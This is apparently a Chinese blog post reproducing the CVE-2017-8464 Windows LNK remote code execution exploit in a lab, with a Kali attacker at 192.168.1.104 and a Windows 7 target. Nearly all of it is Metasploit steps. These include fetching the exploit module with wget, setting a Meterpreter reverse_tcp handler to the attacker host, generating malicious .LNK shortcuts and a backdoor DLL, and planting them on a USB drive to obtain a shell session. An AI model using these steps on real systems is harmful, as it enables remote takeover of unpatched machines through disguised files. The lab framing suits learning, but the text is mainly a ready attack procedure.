msf下的LNK漏洞復現

1.漏洞環境及攻擊系統

漏洞環境

靶機: win7 x64 :192.168.1.102
攻擊機:kali x64 :192.168.1.104

漏洞利用

1.kali 主機下載 cve_2017_8464_lnk_rce.rb:
wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

2.將 cve_2017_8464_lnk_rce.rb 複製到/usr/share/metasploit-framework/modules/exploit/windows/smb/目錄下:

cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

3.生成監聽shell:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.104

msf5 exploit(multi/handler) > exploit -j

在這裏插入圖片描述
4.生成大量的.LNK文件(對應盤符從D盤到Z盤)和要加載的.dll文件(後門文件, copy了一個lnk文件(根據插入靶機U盤後識別的盤符,例如我插入U盤後顯示的E盤,所以就選擇了E結尾的lnk文件)和dll文件到U盤),新開一個終端

msf5 > use exploit/windows/smb/cve_2017_8464_lnk_rce

msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > set lhost 192.168.1.104

msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > exploit

在這裏插入圖片描述

5.將/root/.msf4/local/*所有文件拷貝到/opt目錄下的test文件夾中,然後拷貝到目標靶機windows7X64上

6.拷貝到靶機上,然後執行.dll,如果不行,就在cmd中執行

在這裏插入圖片描述
7.在kali下可以看到成功獲得sesions會話爲1

msf5 exploit(multi/handler) > sessions -i 1
在這裏插入圖片描述
攻擊成功!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章